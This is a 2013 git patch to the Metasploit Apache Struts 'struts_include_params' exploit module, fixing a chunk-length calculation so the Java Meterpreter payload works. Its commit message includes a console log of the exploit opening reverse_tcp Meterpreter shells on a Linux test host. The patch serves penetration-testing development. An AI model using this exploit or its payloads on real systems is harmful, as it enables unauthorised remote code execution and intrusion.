From ab6a2a049b5b7e62e3cf8f24dccfc2ab37998d36 Mon Sep 17 00:00:00 2001 From: Console Date: Thu, 30 May 2013 10:35:29 +0100 Subject: [PATCH] Fix issue with JAVA meterpreter failing to work. Was down to the chunk length not being set correctly. Still need to test against windows. ``` msf exploit(struts_include_params) > show targets Exploit targets: Id Name -- ---- 0 Windows Universal 1 Linux Universal 2 Java Universal msf exploit(struts_include_params) > set target 1 target => 1 msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp msf exploit(struts_include_params) > exploit [*] Started reverse handler on 192.168.0.2:4444 [*] Preparing payload... [*] Sending payload... [*] Sending payload... [*] Sending payload... [*] Transmitting intermediate stager for over-sized stage...(100 bytes) [*] Sending stage (1126400 bytes) to 192.168.0.1 [*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100 [+] Deleted /tmp/57mN5N meterpreter > sysinfo Computer : localhost.localdomain OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64) Architecture : x86_64 Meterpreter : x86/linux meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit msf exploit(struts_include_params) > set target 2 target => 2 msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(struts_include_params) > exploit [*] Started reverse handler on 192.168.0.2:4444 [*] Preparing payload... [*] Sending payload... [*] Sending payload... [*] Sending payload... [*] Sending payload... [*] Sending payload... [*] Sending stage (30246 bytes) to 192.168.0.1 [*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100 [!] This exploit may require manual cleanup of: z4kv.jar meterpreter > sysinfo Computer : localhost.localdomain OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64) Meterpreter : java/java meterpreter > exit [*] Shutting down Meterpreter... ``` --- modules/exploits/multi/http/struts_include_params.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index a58791c5586f..1eb830d4931c 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -135,7 +135,7 @@ def exploit print_status("Preparing payload...") #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. - sub_from_chunk = 109 + @payload_exe.length + target_uri.path.length + datastore['PARAMETER'].length + sub_from_chunk = 109 + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length chunk_length = 2048 - sub_from_chunk chunk_length = ((chunk_length/4).floor)*3 while pl_exe.length > chunk_length